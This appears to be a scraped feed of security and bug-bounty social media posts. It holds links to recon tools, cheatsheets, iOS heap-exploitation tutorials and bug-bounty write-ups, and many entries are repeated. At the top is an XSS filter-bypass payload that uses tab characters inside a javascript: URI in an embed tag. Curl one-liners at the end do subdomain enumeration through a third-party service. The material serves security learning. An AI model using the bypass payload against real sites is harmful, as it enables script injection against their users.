Weird XSS filter bypass today:
<embed><embed src="jav	ascript:al	ert()"
Reflected as:
<embed src="jav	ascript:al	ert()">
<embed><embed src="jav	ascript:al	ert()"
Reflected as:
<embed src="jav	ascript:al	ert()">
Serious back door Vulnerabilities spotted in Tik Tok
https://link.medium.com/iPG0rFpKV3
How to Find Vulnerable Webcams Across the Globe Using Shodan
https://link.medium.com/w897KubuU3
6 Interesting APIs to Check Out in 2020
https://codeburst.io/6-interesting-apis-to-check-out-in-2018-5d6830063f29
#cybersecurity
https://link.medium.com/iPG0rFpKV3
How to Find Vulnerable Webcams Across the Globe Using Shodan
https://link.medium.com/w897KubuU3
6 Interesting APIs to Check Out in 2020
https://codeburst.io/6-interesting-apis-to-check-out-in-2018-5d6830063f29
#cybersecurity
Medium
Serious back door Vulnerabilities spotted in TikTok
The security flaws were identified by a cybersecurity firm Check Point, which the company claims to have fixed
Continuing the iOS exploit development series:
Part 1: Heap Exploit Development: https://azeria-labs.com/heap-exploit-development-part-1/
Part 2: Heap Overflows and the iOS Kernel Heap https://azeria-labs.com/heap-overflows-and-the-ios-kernel-heap/
✨
NEW: Part 3: Grooming the iOS Kernel Heap https://azeria-labs.com/grooming-the-ios-kernel-heap/
Part 1: Heap Exploit Development: https://azeria-labs.com/heap-exploit-development-part-1/
Part 2: Heap Overflows and the iOS Kernel Heap https://azeria-labs.com/heap-overflows-and-the-ios-kernel-heap/
✨
NEW: Part 3: Grooming the iOS Kernel Heap https://azeria-labs.com/grooming-the-ios-kernel-heap/
Azeria-Labs
Heap Exploit Development
Shell scripts for automating the tasks
https://github.com/shibli2700/Rekon
Cheatsheet God
https://github.com/OlivierLaflamme/Cheatsheet-God
Recon tool made for the #OSCP labs
https://github.com/codingo/Reconnoitre
Vuln Scanner
https://github.com/future-architect/vuls
Vulnhub Cheatsheet
https://github.com/Ignitetechnologies/Privilege-Escalation
#cybersecurity,#bugbounty
https://github.com/shibli2700/Rekon
Cheatsheet God
https://github.com/OlivierLaflamme/Cheatsheet-God
Recon tool made for the #OSCP labs
https://github.com/codingo/Reconnoitre
Vuln Scanner
https://github.com/future-architect/vuls
Vulnhub Cheatsheet
https://github.com/Ignitetechnologies/Privilege-Escalation
#cybersecurity,#bugbounty
GitHub
GitHub - shiblisec/Rekon: The project contains multiple shell scripts for automating the tasks during recon.
The project contains multiple shell scripts for automating the tasks during recon. - GitHub - shiblisec/Rekon: The project contains multiple shell scripts for automating the tasks during recon.
Facebook BugBounty
https://t.co/4QlXy2yJNv
https://t.co/Q5jr56KM7H
https://t.co/4dgyrgffYn
https://t.co/z4FmmyO8xy
https://t.co/2XBTxHQ0dK
https://t.co/mXYxn4kpTJ
https://t.co/IcOkvpSKNx
https://t.co/cplMUSfyXm
#bugbountytips
https://t.co/4QlXy2yJNv
https://t.co/Q5jr56KM7H
https://t.co/4dgyrgffYn
https://t.co/z4FmmyO8xy
https://t.co/2XBTxHQ0dK
https://t.co/mXYxn4kpTJ
https://t.co/IcOkvpSKNx
https://t.co/cplMUSfyXm
#bugbountytips
Medium
Facebook New Account Verification Bypass
On September 22, 2019, at 11:30 pm, I was preparing for my board exam and I feel tired reading all those stuff. Then I think to open…
Easy Asset discovery
curl -s -X POST --data "url=$1&Submit1=Submit" https://suip.biz/?act=amass | grep $1 | cut -d ">" -f 2 | awk 'NF' | uniq
curl -s -X POST --data "url=$1&Submit1=Submit" https://suip.biz/?act=subfinder | grep $1 | cut -d ">" -f 2 | awk 'NF' | uniq
curl -s -X POST --data "url=$1&Submit1=Submit" https://suip.biz/?act=amass | grep $1 | cut -d ">" -f 2 | awk 'NF' | uniq
curl -s -X POST --data "url=$1&Submit1=Submit" https://suip.biz/?act=subfinder | grep $1 | cut -d ">" -f 2 | awk 'NF' | uniq